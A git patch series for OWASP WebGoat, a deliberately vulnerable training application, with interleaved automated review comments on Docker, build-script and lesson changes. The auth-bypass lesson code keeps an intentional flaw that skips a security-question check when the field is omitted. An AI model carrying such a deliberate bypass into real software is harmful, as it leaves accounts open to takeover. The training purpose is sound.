index bf15f54c3..77f3f3452 100644 --- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc +++ b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc 
@@ -23,8 +23,8 @@ website. The following items are supported in WebWolf: * Receiving email * Landing page for incoming requests -WebWolf runs as a separate web application and is started automatically when using the Docker image. If you -are not using the Docker image you will need to download the jar file and start it: +WebWolf runs as a separate web application. If you are using the Docker-compose file you can just point your browser webWolfLink:here[] to open WebWolf. +If you want to use the standalone version, you will need to download the jar file and start it: ``` java -jar webwolf-<>.jar [--server.port=9090] [--server.address=localhost] @@ -33,17 +33,7 @@ java -jar webwolf-<>.jar [--server.port=9090] [--server.address=localho By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you can bind it to a different address (default localhost) -WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need -to find out the ip address of the Docker container. - -``` -WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`) -docker pull webgoat/webwolf -docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 9090:9090 webgoat/webwolf /home/webwolf/run.sh -``` - -Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If -you start WebGoat as Docker container you need to start WebWolf as Docker container as well. +Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. This will start the application on port 9090, click webWolfLink:here[] to open WebWolf. diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 4351432b6..781f2cc36 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml 
@@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile index 85562dba0..c5b43c961 100644 --- a/webgoat-server/Dockerfile +++ b/webgoat-server/Dockerfile @@ -10,5 +10,4 @@ USER webgoat RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version} COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar -ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"] EXPOSE 8080 \ No newline at end of file diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index 2f4447c55..af9f6c6c1 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java b/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java index fe42f1c97..adcac776b 100644 --- a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java +++ b/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java @@ -1,5 +1,6 @@ package org.owasp.webgoat; +import lombok.extern.slf4j.Slf4j; import org.hsqldb.server.Server; import org.springframework.beans.factory.annotation.Value; import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; @@ -17,6 +18,7 @@ import javax.sql.DataSource; * JVM. This can only be done if you start a standalone HSQLDB. We need both WebWolf and WebGoat to use the same database */ @Configuration +@Slf4j @ConditionalOnProperty(prefix = "webgoat.start", name = "hsqldb", havingValue = "true") public class HSQLDBDatabaseConfig { 
@@ -27,7 +29,7 @@ public class HSQLDBDatabaseConfig { public Server hsqlStandalone(@Value("${webgoat.server.directory}") String directory, @Value("${hsqldb.silent:true}") boolean silent, @Value("${hsqldb.trace:false}") boolean trace) { - + log.info("Starting internal database on port {} ...", hsqldbPort); Server server = new Server(); server.setDatabaseName(0, "webgoat"); server.setDatabasePath(0, directory + "/data/webgoat"); diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java index 34bde941a..473114c0e 100644 --- a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java +++ b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java @@ -24,17 +24,22 @@ */ package org.owasp.webgoat; +import lombok.extern.slf4j.Slf4j; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; /** + * Main entry point, this project is here to get all the lesson jars included to the final jar file + * * @author nbaars * @date 2/21/17 */ @SpringBootApplication +@Slf4j public class StartWebGoat { public static void main(String[] args) { + log.info("Starting WebGoat with args: {}", args); SpringApplication.run(WebGoat.class, args); } } diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile index 060f6ee9a..2cdb1e708 100644 --- a/webwolf/Dockerfile +++ b/webwolf/Dockerfile @@ -9,6 +9,4 @@ RUN \ USER webwolf COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar -ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.port=9090", "--server.address=0.0.0.0"] - EXPOSE 9090 diff --git a/webwolf/pom.xml b/webwolf/pom.xml index 8bcddea79..bc2d30f0a 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT From bca8b3c650b2764ea139724c8b9e27c3437f78bf Mon Sep 17 00:00:00 2001 
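Review bot: The new startup message reports only `hsqldbPort`, a field declared outside this hunk, and not the address the standalone listener binds to, which is the detail an operator needs once the database is deliberately shared over the network as the class comment describes. If the bind address is configured further down in `hsqlStandalone` (its body continues past the hunk), place the log after that point or include it, e.g. `log.info("Starting internal database on {}:{} ...", bindAddress, hsqldbPort);` with `bindAddress` standing for whatever value is used there. A TCP-reachable HSQLDB instance also deserves one Javadoc sentence on the class stating which component is expected to reach it, so the exposure is not rediscovered later.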
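Review bot: `log.info("Starting WebGoat with args: {}", args)` passes a `String[]` to SLF4J, where overload resolution picks the `Object...` variant and unpacks the array, so only `args[0]` fills the placeholder and an empty array leaves a literal `{}` in the log. Beyond the formatting defect, command-line arguments are where Spring Boot properties such as datasource URLs and credentials are commonly supplied (the compose files in this same series pass `--spring.datasource.url=...` that way), and this line writes them to the application log at INFO on every start. If the line is kept, use `log.info("Starting WebGoat with args: {}", Arrays.toString(args));` with `java.util.Arrays` imported, and consider dropping it or masking secret-bearing properties before release.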
From: Nanne Baars Date: Wed, 8 Aug 2018 18:23:27 +0200 Subject: [PATCH 08/28] Fix buildscripts to wait for Docker and build snapshots --- scripts/build-all.sh | 14 ++++++++------ scripts/build_docker.sh | 4 ++-- scripts/clean-run-docker-compose.sh | 2 +- 3 files changed, 11 insertions(+), 9 deletions(-) diff --git a/scripts/build-all.sh b/scripts/build-all.sh index a4430802e..7835dff20 100644 --- a/scripts/build-all.sh +++ b/scripts/build-all.sh @@ -13,15 +13,17 @@ if [[ "${SUCCESS}" -eq 00 ]] ; then fi -#mvn clean install -#if [[ "$?" -ne 0 ]] ; then -# exit y$? -#fi +mvn clean install +if [[ "$?" -ne 0 ]] ; then + exit y$? +fi cd - sh build_docker.sh +if [[ "$?" -ne 0 ]] ; then + exit y$? +fi -echo "Do you want to run docker-compose?" while true; do read -p "Do you want to run docker-compose?" yn case ${yn} in @@ -29,4 +31,4 @@ while true; do [Nn]* ) exit;; * ) echo "Please answer yes or no.";; esac -done \ No newline at end of file +done diff --git a/scripts/build_docker.sh b/scripts/build_docker.sh index f63329476..a6df2a453 100644 --- a/scripts/build_docker.sh +++ b/scripts/build_docker.sh @@ -3,8 +3,8 @@ WEBGOAT_HOME=$(pwd)/../ cd ${WEBGOAT_HOME}/webgoat-server -docker build -t webgoat/webgoat-8.0 . +docker build -t webgoat/webgoat-v8.0.0.snapshot . cd ${WEBGOAT_HOME}/webwolf -docker build -t webgoat/webwolf . +docker build -t webgoat/webwolf-v8.0.0.snapshot . diff --git a/scripts/clean-run-docker-compose.sh b/scripts/clean-run-docker-compose.sh index c804d8d36..b1e493b87 100644 --- a/scripts/clean-run-docker-compose.sh +++ b/scripts/clean-run-docker-compose.sh @@ -2,4 +2,4 @@ cd .. docker-compose rm -f -docker-compose up +docker-compose -f docker-compose-local.yml up From 3d58049af6ba7de8176281e82337358d98c6a981 Mon Sep 17 00:00:00 2001 
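Review bot: The uncommented `exit y$?` after `mvn clean install` is a typo that turns a failed build into a shell usage error: `exit` requires a numeric argument, and by the time the body runs `$?` holds the status of the `[[ ]]` test (0), so the script ends with `exit y0` instead of propagating Maven's status. The same pattern is added after `sh build_docker.sh`. Replace both blocks with `mvn clean install || exit $?` and `sh build_docker.sh || exit $?`, or add `set -e` at the top of the script (outside this hunk), so a broken build cannot continue into the docker-compose prompt.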
From: Nanne Baars Date: Wed, 8 Aug 2018 18:26:12 +0200 Subject: [PATCH 09/28] docker-compose-local.yml now extends docker-compose.yml WebWolf waits for 8 seconds after WebGoat starts so the database connection can be established --- README.MD | 4 ++-- docker-compose-local.yml | 19 +++++++------------ docker-compose.yml | 4 ++-- 3 files changed, 11 insertions(+), 16 deletions(-) diff --git a/README.MD b/README.MD index 3290fbee4..238f9231f 100644 --- a/README.MD +++ b/README.MD @@ -104,7 +104,7 @@ server.address=x.x.x.x # Vagrant -We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed. +We supply a complete environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed. ```shell $ cd WebGoat/webgoat-images/vagrant-training @@ -112,7 +112,7 @@ We supply a complete development environment using Vagrant, to run WebGoat with ``` Once the provisioning is complete login to the Virtualbox with username vagrant and password vagrant. -The source code will be available in the home directory. +WebGoat and WebWolf will automatically start when you login to this image. # Building a new Docker image diff --git a/docker-compose-local.yml b/docker-compose-local.yml index f65bea120..d94544473 100644 --- a/docker-compose-local.yml +++ b/docker-compose-local.yml 
@@ -3,16 +3,11 @@ version: '2.1' services: webgoat: image: webgoat/webgoat-v8.0.0.snapshot - environment: - - WEBWOLF_HOST=webwolf - - WEBWOLF_PORT=9090 - ports: - - "8080:8080" - volumes: - - .:/home/webgoat/.webgoat - command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0 --server.port=8080" + extends: + file: docker-compose.yml + service: webgoat webwolf: - image: webgoat/webwolf-v8.0.0.snapshot - ports: - - "9090:9090" - command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" + extends: + file: docker-compose.yml + service: webwolf + image: webgoat/webwolf-v8.0.0.snapshot \ No newline at end of file diff --git a/docker-compose.yml b/docker-compose.yml index a4e888edb..27262211d 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -10,9 +10,9 @@ services: - "8080:8080" volumes: - .:/home/webgoat/.webgoat - command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0" + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.port=8080 --server.address=0.0.0.0" webwolf: image: webgoat/webwolf ports: - "9090:9090" - command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat" + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" From 580e50f5580c5062df4d75869301a9835d8e73f3 Mon Sep 17 00:00:00 2001 
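Review bot: The `webwolf` command still relies on `sleep 8 &&` before connecting to `jdbc:hsqldb:hsql://webgoat:9001/webgoat`, so the hostname fix in this hunk (inherited unchanged by docker-compose-local.yml through `extends`) leaves startup racy on slower hosts: if WebGoat's HSQLDB listener is not up within eight seconds WebWolf fails to connect. With `version: '2.1'` a `depends_on` entry using `condition: service_healthy` plus a healthcheck on `webgoat`, or a small retry loop around the java invocation, would make the ordering explicit instead of timed. Separately, the context lines publish `"8080:8080"` and `"9090:9090"` without a host address, which binds a deliberately vulnerable application on every host interface; `"127.0.0.1:8080:8080"` (and likewise for 9090) keeps it local unless wider exposure is intended.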
From: Nanne Baars Date: Fri, 10 Aug 2018 13:15:40 +0200 Subject: [PATCH 10/28] Same form post is used and with autocomplete this does not work because all fields will be posted. The endpoint could no long distinguish between the different actions (sending e-mail and checking password) --- .../webgoat/plugin/SimpleMailAssignment.java | 34 ++++++++----------- .../main/resources/html/PasswordReset.html | 31 +++++++++++------ 2 files changed, 35 insertions(+), 30 deletions(-) diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java index bcd821743..a2c551687 100644 --- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java +++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java @@ -4,7 +4,6 @@ import org.apache.commons.lang3.StringUtils; import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentPath; import org.owasp.webgoat.assignments.AttackResult; -import org.owasp.webgoat.plugin.PasswordResetEmail; import org.springframework.beans.factory.annotation.Value; import org.springframework.http.MediaType; import org.springframework.web.bind.annotation.PostMapping; @@ -14,8 +13,6 @@ import org.springframework.web.client.RestClientException; import org.springframework.web.client.RestTemplate; import java.time.LocalDateTime; -import java.util.Map; -import java.util.Optional; import static java.util.Optional.ofNullable; 
@@ -37,23 +34,10 @@ public class SimpleMailAssignment extends AssignmentEndpoint { @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE) @ResponseBody - public AttackResult sendEmail(@RequestParam Map json) { - String email = (String) json.get("emailReset"); - if (StringUtils.isEmpty(email)) { - email = (String) json.getOrDefault("email", "unknown@webgoat.org"); - } - String password = (String) json.getOrDefault("password", ""); - int index = email.indexOf("@"); - String username = email.substring(0, index == -1 ? email.length() : index); + public AttackResult login(@RequestParam String email, @RequestParam String password) { + String emailAddress = ofNullable(email).orElse("unknown@webgoat.org"); + String username = extractUsername(emailAddress); - if (StringUtils.isEmpty(password)) { - return sendEmail(username, email); - } else { - return checkPassword(password, username); - } - } - - private AttackResult checkPassword(String password, String username) { if (username.equals(getWebSession().getUserName()) && StringUtils.reverse(username).equals(password)) { return trackProgress(success().build()); } else { @@ -61,6 +45,18 @@ public class SimpleMailAssignment extends AssignmentEndpoint { } } + @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE, value = "/reset") + @ResponseBody + public AttackResult resetPassword(@RequestParam String emailReset) { + String email = ofNullable(emailReset).orElse("unknown@webgoat.org"); + return sendEmail(extractUsername(email), email); + } + + private String extractUsername(String email) { + int index = email.indexOf("@"); + return email.substring(0, index == -1 ? email.length() : index); + } + private AttackResult sendEmail(String username, String email) { if (username.equals(getWebSession().getUserName())) { PasswordResetEmail mailEvent = PasswordResetEmail.builder() 
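Review bot: The `ofNullable(email).orElse("unknown@webgoat.org")` in `login` and the matching guard on `emailReset` in `resetPassword` can never trigger: `@RequestParam` is required by default, so a request missing the parameter is rejected with a 400 before the handler runs, and a present parameter binds to a non-null (possibly empty) string. Either make the intent explicit with `@RequestParam(defaultValue = "unknown@webgoat.org") String email` (and the same for `emailReset`) and drop the `ofNullable` calls, or declare `required = false` if the fallback is meant to be reachable. The failure branch of the first hunk's `if` continues outside the hunk.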
diff --git a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html b/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html index 708c4c07f..e8e00e828 100644 --- a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html +++ b/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html @@ -14,16 +14,18 @@
-
-
-
-
+
+ +
+
+
-

Account +

+ Account Access

@@ -41,7 +43,8 @@ Access

- + Forgot your password?

@@ -49,6 +52,12 @@
+ + +
-
+
- +


From f9a4061604f45575ae3623c03252322cefb98978 Mon Sep 17 00:00:00 2001 From: Jelle Besseling Date: Wed, 12 Sep 2018 09:54:44 +0200 Subject: [PATCH 11/28] Fix typo --- .../org/owasp/webgoat/plugin/AccountVerificationHelper.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java index dd9aaeee5..fe5b77828 100644 --- a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java +++ b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java @@ -58,7 +58,7 @@ public class AccountVerificationHelper { return false; } - if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("seQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) { + if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("secQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) { return false; } From a2f28460c0d9e8b9dcdedc88506a594e20dd3ec5 Mon Sep 17 00:00:00 2001 From: donkrasnov <42833573+donkrasnov@users.noreply.github.com> Date: Thu, 30 Aug 2018 12:20:55 +0300 Subject: [PATCH 12/28] Update password_reset.html Without this attribute it is impossible to pass the lesson "password-reset" `Email functionality with WebWolf`. --- .../src/main/resources/templates/password_reset.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html b/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html index 28c7c2f58..a5c3647b7 100644 --- a/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html +++ b/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html @@ -9,7 +9,7 @@
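Review bot: The corrected key makes the comparison consistent, but the check remains guarded by `containsKey("secQuestion1")`, so a submission that omits the parameter skips the answer comparison and falls through; given the lesson directory this is presumably the intended weakness of the auth-bypass exercise rather than a bug. It is worth stating in place so it does not get "fixed" in passing: `// Lesson weakness (intentional): a submission without secQuestion1 is never compared`. The enclosing method starts and ends outside the hunk.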
-
+
@@ -29,4 +29,4 @@
- \ No newline at end of file + From b6e4995d119dd0b6e1e159bc8272efe082e1457a Mon Sep 17 00:00:00 2001 From: Chirag Jariwala Date: Wed, 5 Sep 2018 11:27:20 +0530 Subject: [PATCH 13/28] Fixed Vagrant file - Added correct wget urls for .jar files - changed server address to 0.0.0.0(pointing to all interfaces) because by default it listens for connections on VM's localhost only but we want to access webgoat on NAT adapter via port forwarding --- webgoat-images/vagrant-training/Vagrantfile | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/webgoat-images/vagrant-training/Vagrantfile b/webgoat-images/vagrant-training/Vagrantfile index 4772a8904..47811f8a6 100644 --- a/webgoat-images/vagrant-training/Vagrantfile +++ b/webgoat-images/vagrant-training/Vagrantfile @@ -19,17 +19,17 @@ Vagrant.configure(2) do |config| end config.vm.provision "shell", inline: <<-SHELL - wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar - wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar + wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webgoat-server-8.0.0.M21.jar + wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webwolf-8.0.0.M21.jar sudo add-apt-repository ppa:openjdk-r/ppa sudo apt-get update sudo apt-get install openjdk-8-jre -y SHELL config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL - java -jar webgoat-server-8.0.0.RELEASE.jar & + java -jar webgoat-server-8.0.0.M21.jar --server.address=0.0.0.0 & sleep 40s - java -jar webwolf-8.0.0.RELEASE.jar + java -jar webwolf-8.0.0.M21.jar --server.address=0.0.0.0 & SHELL end From 1520c7571fbf3fdd78876c40640238c70c27e064 Mon Sep 17 00:00:00 2001 
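Review bot: Both jars are fetched with `wget` from the release URL and executed on every boot without any integrity check, so the provisioned VM runs whatever those URLs serve at provisioning time. Pin the expected digests next to the URLs and verify before the `java -jar` lines, e.g. `echo "<sha256-of-webgoat-server-8.0.0.M21.jar>  webgoat-server-8.0.0.M21.jar" | sha256sum -c -` (placeholder digest; take the value from the release). Binding both services to `--server.address=0.0.0.0` is needed for the NAT port forward as the commit says, but it also exposes the intentionally vulnerable applications on any bridged adapter added later; if the `forwarded_port` entries outside this hunk do not set `host_ip: "127.0.0.1"`, a short comment here noting the trade-off would keep it visible.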
From: Josh Cummings Date: Fri, 5 Oct 2018 14:01:52 -0600 Subject: [PATCH 14/28] HTML Tampering Mitigation Description Typo --- .../main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc b/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc index 22eb72fa2..a7f238924 100755 --- a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc +++ b/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc @@ -1,6 +1,6 @@ === Mitigation -In this simple example you noticed that the price is calculated server side and send to the server. The server +In this simple example you noticed that the price is calculated client-side and sent to the server. The server accepted the input as a given and did not calculate the price again. One of the mitigations in this case is to look up the price of the television in your database and calculate the total price again. From ecbbb5258ee604a8d107ebbbbdfaf055828a3e1c Mon Sep 17 00:00:00 2001 From: Joubin Jabbari Date: Sun, 7 Oct 2018 11:15:01 -0700 Subject: [PATCH 15/28] encapsulated the WEBGOAT_HOME in quotes Encapsulating the `WEBGOAT_HOME` variable in quotes allows for spaces to exist in the path --- scripts/build_docker.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scripts/build_docker.sh b/scripts/build_docker.sh index a6df2a453..ec5f28d9f 100644 --- a/scripts/build_docker.sh +++ b/scripts/build_docker.sh @@ -2,9 +2,9 @@ WEBGOAT_HOME=$(pwd)/../ -cd ${WEBGOAT_HOME}/webgoat-server +cd "${WEBGOAT_HOME}"/webgoat-server docker build -t webgoat/webgoat-v8.0.0.snapshot . -cd ${WEBGOAT_HOME}/webwolf +cd "${WEBGOAT_HOME}"/webwolf docker build -t webgoat/webwolf-v8.0.0.snapshot . 
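Review bot: Quoting the expansion protects against spaces in the path, but `cd "${WEBGOAT_HOME}"/webgoat-server` is still unchecked, so if the directory is missing `docker build` runs against whatever directory the script started in (the same applies to the `webwolf` line). Use `cd "${WEBGOAT_HOME}/webgoat-server" || exit 1` for both, or add `set -e` near the top of the script (outside this hunk). The context line `WEBGOAT_HOME=$(pwd)/../` also makes the build context depend on where the script is invoked from; `WEBGOAT_HOME=$(cd "$(dirname "$0")/.." && pwd)` pins it to the repository regardless of the caller's working directory.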
From f81a6852dbf9951d6baf5aa05d5abac909b7a54e Mon Sep 17 00:00:00 2001 From: Patrick Double Date: Sat, 3 Nov 2018 08:38:06 -0500 Subject: [PATCH 16/28] YAML structure fix, postgres version fix The structure of the environment was incorrect. The postgres dialect doesn't match the postgres:latest image. --- docker-compose-postgres.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/docker-compose-postgres.yml b/docker-compose-postgres.yml index 56c9a707c..2ff77f0b5 100644 --- a/docker-compose-postgres.yml +++ b/docker-compose-postgres.yml @@ -12,8 +12,8 @@ services: - spring.datasource.password=webgoat - spring.datasource.driver-class-name=org.postgresql.Driver - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect - - webgoat.server.directory=/home/webgoat/.webgoat/ - - webgoat.user.directory=/home/webgoat/.webgoat/ + - webgoat.server.directory=/home/webgoat/.webgoat/ + - webgoat.user.directory=/home/webgoat/.webgoat/ ports: - "8080:8080" webwolf: @@ -26,9 +26,8 @@ services: - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect ports: - "9090:9090" - db: - container_name: webgoat_db - image: postgres:latest + webgoat_db: + image: postgres:9.4 # Uncomment to store the state of the database on the host. # volumes: # - ./database:/var/lib/postgresql From bf45a0a8e5c7e8cd8d035f40c80cea86350e5373 Mon Sep 17 00:00:00 2001 From: Bartosz Bogatko Date: Sun, 18 Nov 2018 13:18:01 +0100 Subject: [PATCH 17/28] Fix for XXE docs --- .../xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc index e269ec948..4b8b0f3f7 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc 
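Review bot: Renaming the service to `webgoat_db` preserves the hostname the datasource URLs resolve, but the `webwolf` datasource URL is not in the hunk, so confirm it also points at `webgoat_db` rather than the old `db` service name. `postgres:9.4` pins only the major line, which is what `PostgreSQL94Dialect` expects; record that pairing next to the image line, e.g. `# keep in step with hibernate.dialect above`, so a later bump of one does not silently break the other.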
@@ -2,6 +2,7 @@ An XML Entity allows tags to be defined that will be replaced by content when the XML Document is parsed. In general there are three types of entities: + * internal entities * external entities * parameter entities. @@ -34,6 +35,7 @@ may be exploited by dereferencing a malicious URI, possibly allowing arbitrary c local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released. In general we can distinguish the following kind of XXE attacks: + * Classic: in this case an external entity is included in a local DTD * Blind: no output and or errors are shown in the response * Error: try to get the content of a resource in the error message \ No newline at end of file From dd1009bc546567a4f363a2fe2fd727b07f2c48d5 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 14 Dec 2018 12:56:21 +0100 Subject: [PATCH 18/28] Add Maven wrapper --- .mvn/wrapper/maven-wrapper.properties | 1 + mvnw | 286 ++++++++++++++++++++++++++ mvnw.cmd | 161 +++++++++++++++ 3 files changed, 448 insertions(+) create mode 100644 .mvn/wrapper/maven-wrapper.properties create mode 100755 mvnw create mode 100644 mvnw.cmd diff --git a/.mvn/wrapper/maven-wrapper.properties b/.mvn/wrapper/maven-wrapper.properties new file mode 100644 index 000000000..717934671 --- /dev/null +++ b/.mvn/wrapper/maven-wrapper.properties @@ -0,0 +1 @@ +distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.5.4/apache-maven-3.5.4-bin.zip diff --git a/mvnw b/mvnw new file mode 100755 index 000000000..5551fde8e --- /dev/null +++ b/mvnw 
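Review bot: `distributionUrl` is the only entry in the new properties file, so neither the Maven distribution nor the `maven-wrapper.jar` that `mvnw` downloads (and that an optional `wrapperUrl` entry in this same file can redirect) is verified against a checksum before it is executed. For a build that runs `mvnw` in CI, commit the wrapper jar alongside the properties or add a digest check to the download step, and note in this file where the URL and wrapper version came from, e.g. `# maven-wrapper 0.4.2 (see mvnw); distribution digest not verified`. The `mvnw`/`mvnw.cmd` scripts themselves are vendored upstream code and are not reviewed here.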
@@ -0,0 +1,286 @@ +#!/bin/sh +# ---------------------------------------------------------------------------- +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# ---------------------------------------------------------------------------- + +# ---------------------------------------------------------------------------- +# Maven2 Start Up Batch script +# +# Required ENV vars: +# ------------------ +# JAVA_HOME - location of a JDK home dir +# +# Optional ENV vars +# ----------------- +# M2_HOME - location of maven2's installed home dir +# MAVEN_OPTS - parameters passed to the Java VM when running Maven +# e.g. to debug Maven itself, use +# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +# MAVEN_SKIP_RC - flag to disable loading of mavenrc files +# ---------------------------------------------------------------------------- + +if [ -z "$MAVEN_SKIP_RC" ] ; then + + if [ -f /etc/mavenrc ] ; then + . /etc/mavenrc + fi + + if [ -f "$HOME/.mavenrc" ] ; then + . "$HOME/.mavenrc" + fi + +fi + +# OS specific support. $var _must_ be set to either true or false. 
